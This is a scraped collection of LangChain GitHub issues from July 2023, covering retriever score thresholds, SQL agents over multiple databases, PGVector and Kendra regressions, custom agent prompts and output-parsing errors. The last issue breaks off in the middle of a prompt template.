### Expected behavior
The code should have just executed the prompt, And installation of the required libraries should be easier. | Error while trying to run SQL Database Agent example | https://api.github.com/repos/langchain-ai/langchain/issues/7594/comments | 3 | 2023-07-12T11:33:16Z | 2024-02-06T16:32:22Z | https://github.com/langchain-ai/langchain/issues/7594 | 1,800,783,109 | 7,594 |
[
"hwchase17",
"langchain"
]
| ### Feature request
In the `VectorStore`/`VectorStoreRetriever` classes' `_similarity_search_with_relevance_scores` function:
1) Allow different choices of threshold kind: allow users to choose whether >= threshold or <= threshold
2) Allow users to choose to return the relevance score along with the docs
### Motivation
I am working with returning relevant docs that satisfy a certain threshold, and I encountered some problems.
One problem is that, across embedding algorithms and similarity calculations, a higher relevance score is not always better. In fact, when I use `HuggingFaceEmbeddings` with a `Chroma` database, the smaller the relevance score, the better. So I believe it is necessary to let users choose between the two directions here.
The second problem is that I want to see the relevance score; however, in https://github.com/hwchase17/langchain/blob/master/langchain/vectorstores/base.py, lines 474 to 492, the code is hard-coded to return only the docs.
```
def _get_relevant_documents(
self, query: str, *, run_manager: CallbackManagerForRetrieverRun
) -> List[Document]:
if self.search_type == "similarity":
docs = self.vectorstore.similarity_search(query, **self.search_kwargs)
elif self.search_type == "similarity_score_threshold":
docs_and_similarities = (
self.vectorstore.similarity_search_with_relevance_scores(
query, **self.search_kwargs
)
)
docs = [doc for doc, _ in docs_and_similarities]
elif self.search_type == "mmr":
docs = self.vectorstore.max_marginal_relevance_search(
query, **self.search_kwargs
)
else:
raise ValueError(f"search_type of {self.search_type} not allowed.")
return docs
```
I wish there were an option to also return the relevance scores.
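A sketch of the workaround I use in the meantime — call `similarity_search_with_relevance_scores` directly and filter with whichever comparison direction the embedding requires (the threshold value is illustrative):

```python
docs_and_scores = db.similarity_search_with_relevance_scores(query, k=10)

threshold = 0.3  # illustrative value
# For HuggingFace embeddings + Chroma, lower scores are better here:
filtered = [(d, s) for d, s in docs_and_scores if s <= threshold]
# For embeddings where higher is better, flip the comparison:
# filtered = [(d, s) for d, s in docs_and_scores if s >= threshold]
```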
### Your contribution
I would love to open a PR if applicable ;) @hwchase17 | Improve the usage of relevance score threshold and allow the return of the scores | https://api.github.com/repos/langchain-ai/langchain/issues/7590/comments | 2 | 2023-07-12T09:38:17Z | 2023-10-18T16:05:52Z | https://github.com/langchain-ai/langchain/issues/7590 | 1,800,582,601 | 7,590 |
[
"hwchase17",
"langchain"
]
| ### System Info
I am using langchain v0.0.228, but the `namespace` parameter is gone from `from_existing_index()` in v0.0.230.
Why was the namespace removed?
@hwchase17 @eyurtsev @agola11
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
No need.
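For reference, the call that works in v0.0.228 — the index name and namespace are placeholders:

```python
from langchain.vectorstores import Pinecone

db = Pinecone.from_existing_index(
    index_name="my-index",        # placeholder
    embedding=embeddings,
    namespace="my-namespace",     # the parameter missing in v0.0.230
)
```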
### Expected behavior
should be used from_existing_index method with namespace parameter | namespace parameter is gone in pinecone from_existing_index method | https://api.github.com/repos/langchain-ai/langchain/issues/7589/comments | 2 | 2023-07-12T09:34:19Z | 2023-07-12T14:45:09Z | https://github.com/langchain-ai/langchain/issues/7589 | 1,800,575,762 | 7,589 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
If I use ElasticVectorSearch as a retriever via `as_retriever` and set these params:
```python
elastic_vector_search.as_retriever(search_type="similarity_score_threshold",
search_kwargs={"score_threshold": 1.8})
```
If no relevant docs are retrieved using the relevance score threshold of 1.8,
then an error is returned!

### Suggestion:
It should not throw an error when there are no relevant docs.
It should respond with something like "I don't know" or a default OpenAI response. | Question:ConversationalRetrievalChain with retriever | https://api.github.com/repos/langchain-ai/langchain/issues/7588/comments | 1 | 2023-07-12T09:28:48Z | 2023-07-13T03:37:20Z | https://github.com/langchain-ai/langchain/issues/7588 | 1,800,566,204 | 7,588
[
"hwchase17",
"langchain"
]
| ### System Info
MacOS
Python 3.10.6
langchain 0.0.230
langchainplus-sdk 0.0.20
### Who can help?
@hwchase17 @agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
For now, there are only the default `ConversationalChatAgent` and `ConversationalAgent`, and we cannot create custom prompt templates for them. At least, I don't see how to do that in either the docs or the source code.
I think there should be a straight-forward way to do so, just like how you can have a [custom LLM agent](https://python.langchain.com/docs/modules/agents/how_to/custom_llm_chat_agent):
```py
agent = LLMSingleActionAgent(
llm_chain=llm_chain,
output_parser=output_parser,
stop=["\nObservation:"],
allowed_tools=tool_names
)
```
However, when the same code is applied to `ConversationalChatAgent`, that is:
```py
agent = ConversationalChatAgent(
    llm_chain=llm_chain,
    output_parser=output_parser,
    allowed_tools=tool_names
)
```
I get the following error:
```shell
pydantic.error_wrappers.ValidationError: 1 validation error for ConversationalChatAgent
__root__
Got unexpected prompt type <class '__main__.CustomPromptTemplate'> (type=value_error)
```
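For completeness, the closest customization hook I can find is `ConversationalChatAgent.from_llm_and_tools`, which accepts `system_message`/`human_message` strings rather than a full template object — a sketch, assuming partial customization would be acceptable:

```py
from langchain.agents.conversational_chat.base import ConversationalChatAgent

agent = ConversationalChatAgent.from_llm_and_tools(
    llm=llm,
    tools=tools,
    system_message="You are a terse assistant.",  # replaces the default prefix
)
```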
I'm not sure whether this belongs under **Bug Report**, so if I'm doing anything wrong, please tell me about it. Thanks!
### Expected behavior
The agent should be created without errors. | Error when creating a custom ConversationalChatAgent | https://api.github.com/repos/langchain-ai/langchain/issues/7585/comments | 3 | 2023-07-12T08:21:47Z | 2024-01-19T07:28:12Z | https://github.com/langchain-ai/langchain/issues/7585 | 1,800,444,981 | 7,585 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
The code below does not seem to work:
```
db = SQLDatabase.from_uri("mssql+pymssql://<some server>/<some db>",
include_tables=['Some table'], view_support=True)
db1 = SQLDatabase.from_uri("mssql+pymssql://<some other server>/<some other db>",
include_tables=['Some other table'], view_support=True)
toolkit = SQLDatabaseToolkit(db=db, llm=llm, reduce_k_below_max_tokens=True)
sql_agent_executor = create_sql_agent(
llm=llm,
toolkit=toolkit,
verbose=True
)
toolkit1 = SQLDatabaseToolkit(db=db1, llm=llm, reduce_k_below_max_tokens=True)
sql_agent_executor1 = create_sql_agent(
    llm=llm,
    toolkit=toolkit1,  # careful: I originally passed `toolkit` here, which points both executors at the same database
    verbose=True
)
tools = [
Tool(
name = "Object or Product to Classification Association",
func=sql_agent_executor.run,
description="""
Useful for when you need to Query on database to find the object or product to classification association.
<user>: Get me top 3 records with Object number and description for approved classification KKK
<assistant>: I need to check Object or Product to Classification Association details.
<assistant>: Action: SQL Object or Product to Classification Association
<assistant>: Action Input: Check The Object or Product to Classification Association Table
"""
),
Tool(
name = "Authorization or Authority or License Database",
func=sql_agent_executor1.run,
description="""
Useful for when you need to Query on some thing else .
<user>: Get me top 2 Authority Records with LicenseNumber
<assistant>: I need to check Authorization or Authority or License Database details.
<assistant>: Action: SQL Authorization or Authority or License Database
<assistant>: Action Input: Check The Authorization or Authority or License Database Table
"""
)
]
```
Is there an example where we can configure multiple databases as different tools and query them? It seems possible, but in my case, whatever question I ask, it always goes to the first tool. I'm not sure what the problem is.
### Idea or request for content:
_No response_ | DOC: Langchain works well with single database, but in a session if I have to work with multiple database, it does not seem working | https://api.github.com/repos/langchain-ai/langchain/issues/7581/comments | 10 | 2023-07-12T05:02:43Z | 2024-05-23T01:09:42Z | https://github.com/langchain-ai/langchain/issues/7581 | 1,800,186,972 | 7,581 |
[
"hwchase17",
"langchain"
]
| ### Why do I care about this issue?
MLflow also uses sqlalchemy to handle sqlite-based storage, and calls `sqlalchemy.orm.configure_mappers()` during initialization. With langchain>=0.0.228, MLflow fails to start. All MLflow users who choose sqlite-based storage cannot use it with langchain.
### System Info
langchain>=0.0.228
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Executing the following command fails with langchain >= 0.0.228, and no error occurs for langchain <= 0.0.227:
```python
import langchain
import sqlalchemy
sqlalchemy.orm.configure_mappers()
```
Error:
```
---------------------------------------------------------------------------
KeyError Traceback (most recent call last)
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/clsregistry.py:515, in _class_resolver._resolve_name(self)
514 if rval is None:
--> 515 rval = d[token]
516 else:
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/util/_collections.py:346, in PopulateDict.__missing__(self, key)
345 def __missing__(self, key: Any) -> Any:
--> 346 self[key] = val = self.creator(key)
347 return val
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/clsregistry.py:483, in _class_resolver._access_cls(self, key)
481 return value
--> 483 return self.fallback[key]
KeyError: 'EmbeddingStore'
The above exception was the direct cause of the following exception:
InvalidRequestError Traceback (most recent call last)
Cell In[3], line 1
----> 1 sqlalchemy.orm.configure_mappers()
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/mapper.py:4167, in configure_mappers()
4099 def configure_mappers():
4100 """Initialize the inter-mapper relationships of all mappers that
4101 have been constructed thus far across all :class:`_orm.registry`
4102 collections.
(...)
4164
4165 """
-> 4167 _configure_registries(_all_registries(), cascade=True)
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/mapper.py:4198, in _configure_registries(registries, cascade)
4192 Mapper.dispatch._for_class(Mapper).before_configured() # type: ignore # noqa: E501
4193 # initialize properties on all mappers
4194 # note that _mapper_registry is unordered, which
4195 # may randomly conceal/reveal issues related to
4196 # the order of mapper compilation
-> 4198 _do_configure_registries(registries, cascade)
4199 finally:
4200 _already_compiling = False
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/mapper.py:4239, in _do_configure_registries(registries, cascade)
4237 if not mapper.configured:
4238 try:
-> 4239 mapper._post_configure_properties()
4240 mapper._expire_memoizations()
4241 mapper.dispatch.mapper_configured(mapper, mapper.class_)
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/mapper.py:2403, in Mapper._post_configure_properties(self)
2400 self._log("initialize prop %s", key)
2402 if prop.parent is self and not prop._configure_started:
-> 2403 prop.init()
2405 if prop._configure_finished:
2406 prop.post_instrument_class(self)
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/interfaces.py:578, in MapperProperty.init(self)
571 """Called after all mappers are created to assemble
572 relationships between mappers and perform other post-mapper-creation
573 initialization steps.
574
575
576 """
577 self._configure_started = True
--> 578 self.do_init()
579 self._configure_finished = True
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/relationships.py:1632, in RelationshipProperty.do_init(self)
1630 self._check_conflicts()
1631 self._process_dependent_arguments()
-> 1632 self._setup_entity()
1633 self._setup_registry_dependencies()
1634 self._setup_join_conditions()
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/relationships.py:1849, in RelationshipProperty._setup_entity(self, _RelationshipProperty__argument)
1842 resolved_argument: _ExternalEntityType[Any]
1844 if isinstance(argument, str):
1845 # we might want to cleanup clsregistry API to make this
1846 # more straightforward
1847 resolved_argument = cast(
1848 "_ExternalEntityType[Any]",
-> 1849 self._clsregistry_resolve_name(argument)(),
1850 )
1851 elif callable(argument) and not isinstance(
1852 argument, (type, mapperlib.Mapper)
1853 ):
1854 resolved_argument = argument()
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/clsregistry.py:519, in _class_resolver._resolve_name(self)
517 rval = getattr(rval, token)
518 except KeyError as err:
--> 519 self._raise_for_name(name, err)
520 except NameError as n:
521 self._raise_for_name(n.args[0], n)
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/clsregistry.py:500, in _class_resolver._raise_for_name(self, name, err)
490 raise exc.InvalidRequestError(
491 f"When initializing mapper {self.prop.parent}, "
492 f'expression "relationship({self.arg!r})" seems to be '
(...)
497 f"['{clsarg}']] = relationship()\""
498 ) from err
499 else:
--> 500 raise exc.InvalidRequestError(
501 "When initializing mapper %s, expression %r failed to "
502 "locate a name (%r). If this is a class name, consider "
503 "adding this relationship() to the %r class after "
504 "both dependent classes have been defined."
505 % (self.prop.parent, self.arg, name, self.cls)
506 ) from err
InvalidRequestError: When initializing mapper Mapper[CollectionStore(langchain_pg_collection)], expression 'EmbeddingStore' failed to locate a name ('EmbeddingStore'). If this is a class name, consider adding this relationship() to the <class 'langchain.vectorstores.pgvector.CollectionStore'> class after both dependent classes have been defined.
```
It was likely introduced by this PR: https://github.com/hwchase17/langchain/pull/7370.
### Expected behavior
No error should occur. | sqlalchemy fails to initialize with KeyError "EmbeddingStore" | https://api.github.com/repos/langchain-ai/langchain/issues/7579/comments | 1 | 2023-07-12T04:18:26Z | 2023-07-12T07:35:27Z | https://github.com/langchain-ai/langchain/issues/7579 | 1,800,138,889 | 7,579 |
[
"hwchase17",
"langchain"
]
| https://github.com/hwchase17/langchain/blob/2667ddc6867421842fe027f1946644f452de8eb3/langchain/chains/base.py#L386-L393
when I have this:
```
chain = create_structured_output_chain(Categorization, llm, prompt, verbose=True)
response = chain.run(trx_description)
```
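At runtime the mismatch is easy to see (a check I added, using the variables from the snippet above):

```python
print(type(response))  # <class 'dict'> at runtime, despite run() being annotated -> str
```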
my `response` object is a dict, not a str, but the type hints misled me into thinking it was a str. | chain.run doesn't necessarily return a `str` | https://api.github.com/repos/langchain-ai/langchain/issues/7578/comments | 16 | 2023-07-12T04:11:51Z | 2023-10-13T02:31:07Z | https://github.com/langchain-ai/langchain/issues/7578 | 1,800,131,260 | 7,578
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.230
### Who can help?
@raymond-yuan
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Fill in appropriate values for parameters
```
db = PGVector.from_documents(
embedding=embeddings,
documents=docs,
collection_name=COLLECTION_NAME,
connection_string=CONNECTION_STRING,
pre_delete_collection=True,
)
```
Produces:
```
Traceback (most recent call last):
File "create_pgvector_index_hr.py", line 70, in <module>
db = PGVector.from_documents(
File "/home/coder/venv-openai-slackbot/lib/python3.8/site-packages/langchain/vectorstores/pgvector.py", line 578, in from_documents
return cls.from_texts(
File "/home/coder/venv-openai-slackbot/lib/python3.8/site-packages/langchain/vectorstores/pgvector.py", line 453, in from_texts
return cls.__from(
File "/home/coder/venv-openai-slackbot/lib/python3.8/site-packages/langchain/vectorstores/pgvector.py", line 213, in __from
store = cls(
TypeError: ABCMeta object got multiple values for keyword argument 'connection_string'
```
and appears related to this change: https://github.com/hwchase17/langchain/blame/master/langchain/vectorstores/pgvector.py#L213-L220
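Until there's a fix, pinning the previous release (`pip install "langchain==0.0.229"`) works as a stopgap.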
### Expected behavior
The above code works with langchain==0.0.229.
The code should not throw an exception, as it did not prior to 0.0.230. | PGVector.from_documents breaking from 0.0.229 to 0.0.230 | https://api.github.com/repos/langchain-ai/langchain/issues/7577/comments | 2 | 2023-07-12T02:50:01Z | 2023-07-13T03:26:29Z | https://github.com/langchain-ai/langchain/issues/7577 | 1,800,069,048 | 7,577
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain version: 0.0.229
Platform: AWS Lambda execution
Python version: 3.9
I get the following error when creating the AmazonKendraRetriever using LangChain version 0.0.229.
Code to create retriever:
`retriever = AmazonKendraRetriever(index_id=kendra_index)`
Error:
```
[ERROR] ValidationError: 1 validation error for AmazonKendraRetriever
__root__
Could not load credentials to authenticate with AWS client. Please check that credentials in the specified profile name are valid. (type=value_error)
Traceback (most recent call last):
File "/var/task/lambda_function.py", line 171, in lambda_handler
retriever = AmazonKendraRetriever(index_id=kendra_index)
File "/opt/python/langchain/load/serializable.py", line 74, in __init__
super().__init__(**kwargs)
  File "pydantic/main.py", line 341, in pydantic.main.BaseModel.__init__
```
When using LangChain version 0.0.219 this error does not occur.
Issue also raised on aws-samples git repo with potential solution: https://github.com/aws-samples/amazon-kendra-langchain-extensions/issues/24
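The workaround described there, roughly — build the boto3 client from the Lambda execution role yourself and hand it to the retriever (assuming the retriever accepts a pre-built `client`, as that issue suggests; the region is a placeholder):

```python
import boto3
from langchain.retrievers import AmazonKendraRetriever

kendra_client = boto3.client("kendra", region_name="us-east-1")  # placeholder region
retriever = AmazonKendraRetriever(index_id=kendra_index, client=kendra_client)
```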
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. Install latest version of Langchain
2. Follow instructions here: https://python.langchain.com/docs/modules/data_connection/retrievers/integrations/amazon_kendra_retriever
### Expected behavior
Error not thrown when creating AmazonKendraRetriever | AmazonKendraRetriever "Could not load credentials" error in latest release | https://api.github.com/repos/langchain-ai/langchain/issues/7571/comments | 1 | 2023-07-12T00:16:40Z | 2023-07-13T03:47:37Z | https://github.com/langchain-ai/langchain/issues/7571 | 1,799,948,758 | 7,571 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
The current version of the Notion DB document loader doesn't support the following properties as metadata:
- `unique_id`
- https://www.notion.so/help/unique-id
- `status`
- https://www.notion.so/help/guides/status-property-gives-clarity-on-tasks
- `people`
  - a useful property when a task is assigned to assignees
### Suggestion:
I would like to make a PR to fix this issue if it's okay. | Issue: Document loader for Notion DB doesn't supports some properties | https://api.github.com/repos/langchain-ai/langchain/issues/7569/comments | 0 | 2023-07-12T00:02:03Z | 2023-07-12T07:34:56Z | https://github.com/langchain-ai/langchain/issues/7569 | 1,799,937,363 | 7,569 |
[
"hwchase17",
"langchain"
]
| ### System Info
python==3.9.17
langchain==0.0.190
Win 11 64 bit
### Who can help?
@hwchase17 @agol
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [X] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
# Instantiate the chain
example_gen_chain = QAGenerateChain.from_llm(ChatOpenAI())
example_gen_chain.apply_and_parse([{'doc': data[2]}])
[Out]:
ValueError Traceback (most recent call last)
Cell In[36], line 1
----> 1 example_gen_chain.apply_and_parse([{'doc': data[2]}])
File ~\anaconda3\envs\nlp-openai-langchain\lib\site-packages\langchain\chains\llm.py:257, in LLMChain.apply_and_parse(self, input_list, callbacks)
255 """Call apply and then parse the results."""
256 result = self.apply(input_list, callbacks=callbacks)
--> 257 return self._parse_result(result)
File ~\anaconda3\envs\nlp-openai-langchain\lib\site-packages\langchain\chains\llm.py:263, in LLMChain._parse_result(self, result)
259 def _parse_result(
260 self, result: List[Dict[str, str]]
261 ) -> Sequence[Union[str, List[str], Dict[str, str]]]:
262 if self.prompt.output_parser is not None:
--> 263 return [
264 self.prompt.output_parser.parse(res[self.output_key]) for res in result
265 ]
266 else:
267 return result
File ~\anaconda3\envs\nlp-openai-langchain\lib\site-packages\langchain\chains\llm.py:264, in <listcomp>(.0)
259 def _parse_result(
260 self, result: List[Dict[str, str]]
261 ) -> Sequence[Union[str, List[str], Dict[str, str]]]:
262 if self.prompt.output_parser is not None:
263 return [
--> 264 self.prompt.output_parser.parse(res[self.output_key]) for res in result
265 ]
266 else:
267 return result
File ~\anaconda3\envs\nlp-openai-langchain\lib\site-packages\langchain\output_parsers\regex.py:28, in RegexParser.parse(self, text)
26 else:
27 if self.default_output_key is None:
---> 28 raise ValueError(f"Could not parse output: {text}")
29 else:
30 return {
31 key: text if key == self.default_output_key else ""
32 for key in self.output_keys
33 }
ValueError: Could not parse output: QUESTION: What is the fabric composition of the Maine Expedition Shirt with PrimaLoft®?
ANSWER: The fabric composition of the Maine Expedition Shirt with PrimaLoft® is 85% premium wool and 15% nylon.
```
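A workaround sketch I'd try — bypass `apply_and_parse` and run the regex myself (the pattern mirrors the error text above; `data` comes from the notebook):

```python
import re

raw = example_gen_chain.apply([{"doc": data[2]}])[0]["text"]  # skip built-in parsing
m = re.search(r"QUESTION:\s*(.*?)\s*ANSWER:\s*(.*)", raw, re.DOTALL)
qa_pair = {"query": m.group(1), "answer": m.group(2)} if m else None
```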
### Expected behavior
Returns parsed output. | ` ValueError: Could not parse output` when using `QAGenerateChain`'s `.apply_and_parse()` method | https://api.github.com/repos/langchain-ai/langchain/issues/7559/comments | 6 | 2023-07-11T19:44:49Z | 2023-10-31T16:06:20Z | https://github.com/langchain-ai/langchain/issues/7559 | 1,799,649,527 | 7,559 |
[
"hwchase17",
"langchain"
]
| ### Feature request
There are tools with a `func` whose coroutine implementation would be exactly the same. E.g.,
```python
def adder(x, y):
return x+y
async def aadder(x, y):
return x+y
adder_tool = Tool(func=adder, coroutine=aadder, ...)
```
I have to define `adder` and `aadder` redundantly.
Of course the shared logic can be factored out of the two definitions, but I'd prefer defining a single function and reusing `func` for the async call. A possible implementation, at [this line](https://github.com/hwchase17/langchain/blob/master/langchain/tools/base.py#L453C1-L473C65), would look like this:
```python
async def _arun(
self,
*args: Any,
run_manager: Optional[AsyncCallbackManagerForToolRun] = None,
**kwargs: Any,
) -> Any:
"""Use the tool asynchronously."""
if self.coroutine:
...
elif self.default_coroutine: # introducing some parameter
return self.run(*args, run_manager=run_manager, **kwargs)
raise NotImplementedError("Tool does not support async")
```
With this, registering `adder` would look like this:
```python
def adder(x, y):
return x+y
adder_tool = Tool(func=adder, default_coroutine=True, ...)
```
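An alternative sketch that keeps the event loop free — wrap the sync `func` in an executor rather than calling it directly (my variation, not part of the proposal above):

```python
import asyncio
from functools import partial

async def _default_coroutine(self, *args, **kwargs):
    loop = asyncio.get_running_loop()
    # Run the sync func in a worker thread so it doesn't block the event loop.
    return await loop.run_in_executor(None, partial(self.func, *args, **kwargs))
```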
### Motivation
Avoid redundant function definitions and simplify tool declarations.
### Your contribution
I can make a PR as proposed if it's the right approach. | Use `func` as a default `coroutine` method in Tool instantiation | https://api.github.com/repos/langchain-ai/langchain/issues/7558/comments | 2 | 2023-07-11T19:23:13Z | 2023-10-17T16:04:49Z | https://github.com/langchain-ai/langchain/issues/7558 | 1,799,618,568 | 7,558 |
[
"hwchase17",
"langchain"
]
| ### Feature request
Introduce a follow-up query recommender callback to enhance user experience and engagement in chatbot use cases.
The recommender callback will suggest relevant follow-up queries generated by LLM based on the user's conversation history, facilitating smoother interactions.
The proposed flow is as follows:
- Utilize the configured memory to recommend follow-up queries by analyzing the chat history.
- In the absence of configured memory, leverage the current question and answer to suggest follow-up queries.
Usage: it's up to the user how to surface these recommended queries.
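A minimal sketch of what such a callback could look like — assuming the answer is available in the chain outputs and an LLM handle is passed in:

```python
from langchain.callbacks.base import BaseCallbackHandler

class FollowUpRecommender(BaseCallbackHandler):
    """Sketch: suggest follow-up queries after each chain run."""

    def __init__(self, llm):
        self.llm = llm
        self.suggestions = []

    def on_chain_end(self, outputs, **kwargs):
        # Fall back across common output keys; adjust for your chain.
        answer = outputs.get("answer") or outputs.get("text", "")
        prompt = f"Suggest three short follow-up questions to this answer: {answer}"
        self.suggestions = self.llm.predict(prompt).strip().splitlines()
```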
### Motivation
The inclusion of this feature would greatly benefit various chatbot use cases.
By suggesting follow-up queries, the chatbot can proactively guide the conversation, helping users navigate complex interactions more efficiently. This feature has the potential to enhance user satisfaction and streamline the overall user experience. While the exact extent of its usefulness may vary, it is a valuable addition that can significantly improve the chatbot's capabilities.
### Your contribution
I can work on this, let me know your thoughts @hwchase17 | Follow-up Query Recommender Callback | https://api.github.com/repos/langchain-ai/langchain/issues/7557/comments | 2 | 2023-07-11T18:18:50Z | 2023-12-21T16:07:34Z | https://github.com/langchain-ai/langchain/issues/7557 | 1,799,513,554 | 7,557 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain 0.230
python 3.10
From first example of using calculator from: https://learn.deeplearning.ai/langchain/lesson/7/agents
```
> Entering new chain...
ACTION: json
{
  "action": "Calculator",
  "action_input": "25% of 300"
}
```
This text is what the ChatOutputParser in agents/chat/output_parser.py receives (I prefixed it with ACTION in my print statement).
The word `json` now prefixes the JSON blob from the ChatOpenAI LLM, which causes the agent to fail. One possible fix — which I verified works, though I'm not sure it's the right one — is to check for the prefix and strip it:
```python
if action.startswith("json"):
    action = action[4:]
```
This seems to work and lets the first two examples in the tutorial run.
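A slightly more defensive variant of the same idea (my phrasing, not tested against every output):

```python
# Strip an optional language tag left over from a ```json fenced block.
action = action.strip()
if action.startswith("json"):
    action = action[len("json"):].strip()
```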
### Who can help?
@hwchase17 and @agola11 for LLM/Chat wrappers/Agents.
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce behavior.
Run source code from @hwchase17 Deeplearning class: https://learn.deeplearning.ai/langchain/lesson/7/agents
The calculator and wikipedia examples don't run.
### Expected behavior
The calculator and Wikipedia examples should work once the parser handles the new(?) output format from ChatOpenAI in the tutorial. | Using Agent - ChatOpenAI - response can't be parsed because it starts with 'json' for next action (RC identified and fix proposed) | https://api.github.com/repos/langchain-ai/langchain/issues/7554/comments | 5 | 2023-07-11T16:48:21Z | 2023-10-10T16:15:58Z | https://github.com/langchain-ai/langchain/issues/7554 | 1,799,345,871 | 7,554
[
"hwchase17",
"langchain"
]
| ### System Info
langchain version: '0.0.230'
llama-index version: '0.7.4'
python: 3.10.11
### Who can help?
@hwchase17
@agola11
@eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [X] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
**When I try to use GPTIndexChatMemory to embed my conversation and store all of it, the memory feature no longer works. My code is below. I also want to save the memory in a folder together with its embeddings, and I can't.**
```python
from llama_index.langchain_helpers.memory_wrapper import GPTIndexChatMemory, GPTIndexMemory
from langchain.chat_models import ChatOpenAI
from langchain.agents import AgentType, initialize_agent  # initialize_agent was missing
from llama_index import ServiceContext, GPTListIndex, LangchainEmbedding  # LangchainEmbedding was missing
from langchain.embeddings import OpenAIEmbeddings
llm = ChatOpenAI(temperature=0)
embed_model = LangchainEmbedding(OpenAIEmbeddings())
service_context = ServiceContext.from_defaults(embed_model=embed_model)
index = GPTListIndex([], service_context=service_context)
memory = GPTIndexChatMemory(
index=index,
memory_key="chat_history",
query_kwargs={"response_mode": "compact", "service_context":service_context},
input_key="input",
return_messages=True,
return_source= True
)
agent_executor = initialize_agent(
[], llm, verbose = True,agent=AgentType.CONVERSATIONAL_REACT_DESCRIPTION, memory=memory, handle_parsing_errors="Check your output and make sure it conforms!"
)
agent_executor.agent.llm_chain.prompt.template = """Assistant is a large language model trained by OpenAI.
Assistant is designed to be able to assist with a wide range of tasks, from answering simple questions to providing in-depth explanations and discussions on a wide range of topics. As a language model, Assistant is able to generate human-like text based on the input it receives, allowing it to engage in natural-sounding conversations and provide responses that are coherent and relevant to the topic at hand.
Assistant is constantly learning and improving, and its capabilities are constantly evolving. It is able to process and understand large amounts of text, and can use this knowledge to provide accurate and informative responses to a wide range of questions. Additionally, Assistant is able to generate its own text based on the input it receives, allowing it to engage in discussions and provide explanations and descriptions on a wide range of topics.
